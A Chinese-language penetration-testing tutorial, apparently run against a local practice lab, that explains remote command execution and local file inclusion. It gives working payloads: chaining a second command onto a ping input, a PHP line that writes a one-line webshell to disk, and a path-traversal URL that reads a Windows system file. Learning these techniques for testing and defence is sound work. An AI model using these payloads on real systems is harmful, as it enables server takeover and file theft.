本文我们接着学习《跟着表哥学渗透》系列😀。接着前面的知识点,我们今天来看看RCE和本地文件包含漏洞吧!
什么是RCE?
RCE
漏洞是指,在程序设计之初。为了給用户提供方便。会給用户提供一个执行命令的入口。如(我们的路由器会有一个ping
操作的web
界面。)由于没有做到严格的安全控制。可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。
漏洞利用
我们在执行ping
命令时,可以通过管道符|,||,&&
进行拼装命令。如
ping bbskali.cn && dir
即,在执行完ping
命令后,在执行dir
命令。
exec “eval”
这几个命令,在默认的windows和Linux是没有的。她是PHP的几个扩展插件。我们直接输入
phpinfo();
发现直接输出了php信息。
既然能直接执行php命令。那为何不能用php生成一句话呢?
fputs(fopen('shell.php','w'),'<?php assert($_POST[bbskali]);?>');
文件包含(本地)
我们随便选择一位NBA的球星。观察url地址你会发现链接中多了一个file1.php
既然能够读取文件,想必系统文件也能够读取吧!
构造链接
http://192.168.50.105:89/vul/fileinclude/fi_local.php?filename=../../../../../../windows/win.ini&submit=%E6%8F%90%E4%BA%A4
更多精彩文章 欢迎关注我们
原文始发于微信公众号(kali黑客笔记):《跟着表哥学渗透》之RCE&文件包含(六)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论